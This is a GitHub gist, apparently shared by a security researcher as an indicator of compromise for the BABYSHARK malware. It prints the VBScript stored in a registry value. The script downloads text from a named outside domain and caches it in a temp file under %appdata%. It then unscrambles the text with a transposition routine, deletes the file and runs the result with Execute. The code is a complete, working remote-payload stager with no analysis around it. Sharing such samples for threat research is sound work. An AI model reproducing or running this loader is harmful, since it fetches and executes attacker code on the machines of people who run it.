Skip to content

Instantly share code, notes, and snippets.

@JohnHammond
Created February 23, 2022 19:19
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JohnHammond/7b619e5baaf8e25bad652dd27bb826a3 to your computer and use it in GitHub Desktop.
Save JohnHammond/7b619e5baaf8e25bad652dd27bb826a3 to your computer and use it in GitHub Desktop.
BABYSHARK malware IOC registry value AppXr1bysyqf6kpaq1aje5sbadka8dgx3g4g
Set Post0 = CreateObject("msxml2.xmlhttp")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set wShell=CreateObject("WScript.Shell")
folder = wShell.ExpandEnvironmentStrings("%appdata%")
data="no"
If objFSO.FileExists(folder+"\\desktop.tmp") Then
Set f = objFSO.OpenTextFile(folder+"\\desktop.tmp", 1, True)
data = f.ReadAll
f.Close
d=7
L=Len(data)
s=""
For jx=0 To d-1
For ix=0 To Int(L/d)-1
s=s&Mid(data,ix*d+jx+1,1)
Next
Next
s=s&Right(data,L-Int(L/d)*d)
data=s
objFSO.DeleteFile folder+"\\desktop.tmp"
Else
Post0.open "GET", "https://worldinfocontact.club/111/alice/expres.php?op=2",False
Post0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
Post0.Send
t0=Post0.responseText
Set f = objFSO.CreateTextFile(folder+"\\desktop.tmp", True)
f.Write(t0)
f.Close
End If
If data<>"no" Then
Execute(data)
End If
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment